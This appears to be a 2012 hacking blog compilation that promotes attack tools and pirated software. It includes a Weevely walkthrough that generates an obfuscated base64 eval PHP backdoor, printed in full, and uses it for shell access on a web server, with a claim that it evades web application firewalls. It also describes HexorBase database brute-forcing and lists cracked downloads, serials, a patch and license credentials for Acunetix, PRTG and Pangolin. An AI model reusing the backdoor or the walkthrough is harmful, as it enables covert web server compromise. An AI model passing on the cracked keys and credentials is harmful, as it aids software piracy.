Brute Force Database Servers with HexorBase

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

It works on Linux and Windows running the following:

Requirements:

python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2

To install simply run the following command in terminal after changing directory to the path were the downloaded package is:

Select AllCode:

root@host:~# dpkg -i hexorbase_1.0_all.deb

To get the source code for this project from SVN, here’s the checkout link:

Select AllCode:

root@host:~# svn checkout http://hexorbase.googlecode.com/svn/

Heres a video on how the program works

Download:

http://code.google.com/p/hexorbase/

©2012, copyright BLACK BURN

Generate and Manage Stealth PHP backdoors

Weevely create and manage PHP trojan designed to be hardly detectable. Is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions.

With weevely you can generate PHP code to trojanize a web server, this backdoor acts like a telnet client to execute commands or inject addictional function on the backdoored server. Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review.

The program trying to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server. Also the backdoor server code is small and easily hideable in other PHP files, the core is dynamically crypted in order to bypass pattern matching controls.

Usage:

Code:

root@bt:/weevely# ./main.py  -h
 
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/
 
Usage: main.py [options]
 
Options:
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p .
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor .
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p
                        .
  -t, --terminal        Start a terminal-like session, requires -u and -p .
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the give
                        file, in the form 'label,url,password' where label is
                        optional.
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor .
  -u URL, --url=URL     Remote backdoor URL .

Choose your password and create the backdoor:

Code:

root@bt:/weevely# ./main.py -g -p coco -o door.php
 
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/
 
+ Backdoor file 'door.php' created with password 'coco'.
 
root@bt:/weevely# ls -al door.php
 
-rw-r--r-- 1 root root 321 2011-10-06 00:20 door.php
 
root@bt:/weevely# cat door.php
 
<?php eval(base64_decode('aW5pX3NldCgnZXJyb3JfbG9nJywgJy9kZXYvbnVsbCcpO3Bh
cnNlX3N0cigkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sJGEpO2lmKHJlc2V0KCRhKT09J2NvJy
AmJiBjb3VudCgkYSk9PTkpIHtlY2hvICc8Y28+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3Jl
cGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2
hvICc8L2NvPic7fQ==')); ?>

Upload the backdoor to your customer’s web server and try to access it:

Code:

root@bt:/weevely# ./main.py -t -u http://www.foo.org/.../door.php -p coco
 
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
 
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
 
[www@server /var/www] id
uid=69(www) gid=69(www) groups=69(www)
[www@server /var/www] pwd
/var/www

Voila!

Furthermore, i tried to test weevely on servers that are protected from web application firewalls (specifically by Cloudflare and Imperva) and worked fine.

Download: http://code.google.com/p/weevely/

©2012, copyright BLACK BURN

Paessler PRTG Traffic Grapher 6.2.2.984+serial

Paessler PRTG Traffic Grapher v6.2.2.984-DOA | 38 Mb



If you need to know what applications or IP addresses are causing the traffic in your network you can use packet sniffing (PRTG looks at every single data packet travelling through your network for accounting purposes) or NetFlow/jFlow/sFlow-based monitoring. For both technologies PRTG can analyze the bandwidth usage and break it down to the network protocols or computers in your network.

Network problems create business emergencies. When the network goes down, employees can't read emails. Customers can't purchase the product. Work stops. Network monitoring helps you keep your business healthy:

Avoid expensive outages
Address bottlenecks before they cause problems
Reduce costs by buying only the hardware you need

home:

Code:

http://www.paessler.com/prtg

download:

Code:

http://extabit.com/file/28dttmq35l8jb
http://netload.in/dateiLHInuZYiKz/Paessler.PRTG.Traffic.Grapher.v6.2.2.984-DOA.rar.htm

©2012, copyright BLACK BURN

Pangolin Amazing SQL injection Professional with Key

Code: http://depositfiles.com/files/m8i3r8i94 pass- alboraaq

©2012, copyright BLACK BURN

Acunetix Web Vulnerability Scanner 8 + Patch

Acunetix Web Vulnerability Scanner 8 + Patch

Description
Audit your website security with Acunetix Web Vulnerability Scanner. As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases.

Firewalls, SSL and locked-down servers are futile against web application hacking!

Web application attacks, launched on port 80/443, go straight through the firewall, past operating system and network level security, and right in to the heart of your application and corporate data. Tailor-made web applications are often insufficiently tested, have undiscovered vulnerabilities and are therefore easy prey for hackers.

Acunetix - a world-wide leader in web application security

Acunetix has pioneered the web application security scanning technology: Its engineers have focused on web security as early as 1997 and developed an engineering lead in web site analysis and vulnerability detection. Acunetix Web Vulnerability Scanner includes many innovative features:

* An automatic javascript analyzer allowing for security testing of Ajax and Web 2.0 applications
* Industries' most advanced and in-depth SQL injection and Cross site scripting testing
* Visual macro recorder makes testing web forms and password protected areas easy
* Extensive reporting facilities including VISA PCI compliance reports
* Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
* Intelligent crawler detects web server type and application language
* Acunetix crawls and analyzes websites including flash content, SOAP and AJAX

Which Vulnerabilities does Acunetix WVS Check for?

Acunetix WVS automatically checks for the following vulnerabilities among others:

* Version Check

o Vulnerable Web Servers
o Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution.

* CGI Tester

o Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE)
o Verify Web Server Technologies

* Parameter Manipulation

o Cross-Site Scripting (XSS) – over 40 different XSS variations are tested.
o SQL Injection
o Code Execution
o Directory Traversal
o File Inclusion
o Script Source Code Disclosure
o CRLF Injection
o Cross Frame Scripting (XFS)
o PHP Code Injection
o XPath Injection
o Full Path Disclosure
o LDAP Injection
o Cookie Manipulation
o Arbitrary File creation (AcuSensor Technology)
o Arbitrary File deletion (AcuSensor Technology)
o Email Injection (AcuSensor Technology)
o File Tampering (AcuSensor Technology)
o URL redirection
o Remote XSL inclusion

* MultiRequest Parameter Manipulation

o Blind SQL/XPath Injection

+ DNS Server vulnerabilities (Open zone transfer, Open recursion, cache poisoning)
+ FTP server checks (list of writable FTP directories, weak FTP passwords, anonymous access allowed)
+ Security and configuration checks for badly configured proxy servers
+ Checks for weak SNMP community strings and weak SSL cyphers
+ and many other network level vulnerability checks!

Other vulnerability tests may also be preformed using the manual tools provided, including:

* Input Validation
* Authentication attacks
* Buffer overflows
* Blind SQL injection
* Sub domain scanning


Screenshots:








Download: Click Here!
Password: alboraaq.com
©2012, copyright BLACK BURN

FULL VERSION- Acunetix Web Vulnerability Scanner 8

hello all
Here i am sharing Acunetix Web Vulnerability Scanner 8 Full Version

Goto:
http://www.acunetix.com/download/fullver8/

Username: acunetixwvsfullv8
Password:nFu834!29bg_S2q


License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
Name: Hmily/[LCG]
ComPany: Www.52PoJie.Cn
Email: Hmily@Acunetix.com
Telephone: 110

Hope you all like it 
©2012, copyright BLACK BURN

The Best Tools Collection

my Software Collection for hacking and programming...hope you all will like this collection  !!


* Must Run A Virus Scan First Please *
PenProtect
You can put a password for your pendrive (USB flash) using this tool:
http://uploading.com/files/XG7SFN0A/PenProtect.rar.html

Craagle v3.0 
Find all cracks and serials you want for your trial softwares 
http://uploading.com/files/JKU1GYZL/Craa...0.exe.html

VBScript make your pc to speak 
I know that this script was post 2 days in this forum but noticed that some people can't make it to work. This is a working VBScript. Try it from here:
http://uploading.com/files/EVSAJ1F1/Spea...t.rar.html
or
http://uploading.com/files/3A6TL3L2/spea...t.vbs.html

Advanced zip Password Recovery v4.00 
This software will find passwords for protected zip files. Serial number included
http://uploading.com/files/cfmb4a92/Adva...v4.00.zip/

Advanced Archive Password Recovery pro v4.5 
This This software will find passwords for protected rar files. Serial number included
http://uploading.com/files/HXA95YI2/Adva...5.zip.html

Process_Hacker 
See everything that is connected from your pc to the web and vice versa. Very effective to catch hackers
http://uploading.com/files/39a12df2/Proc...acker.rar/

Brutus quick buttons 
This is a very good software for lazy people who want everything to be done with the easiest and the simplest way. Use quick buttons to log in/out , restart , shutdown your system.
http://uploading.com/files/DUQUWYKA/brut...s.exe.html

Typing Master Pro 
No more typing nightmares. Learn to type one your keyboard like a master. It is very easy to use and would promote you to a master in typing on the keyboard in few days.
http://uploading.com/files/9m64b2a7/Typi...erial.rar/

Html lock 
Protect your web page with this uniquesoftware. This software will set a very strong password for your html pages. Actually it will encode all the page contents for the first time and will encode the already encode code another time. And you will be able to put a username and a password for your html page. Off course the username and the password is encoded as well.
http://uploading.com/files/52fd16ed/htmllock.zip/ 

7z 
Save from 70-80% of your file required space using this archiver. 7z is the most powerful archiver ever made. No Winrar or winzip or winace can beat him in this domain. I don't think i need to explain it since he is the most archive software successful and the most reputated one in the world.
http://uploading.com/files/XKWOTFR5/7z.zip.html

Delayed Shutdown 
This software will help you to time when you want your pc to turn off. Everything is automated. Just set the number of hours and the software will start the count down.
http://uploading.com/files/391C7AUT/Dela...n.zip.html

©2012, copyright BLACK BURN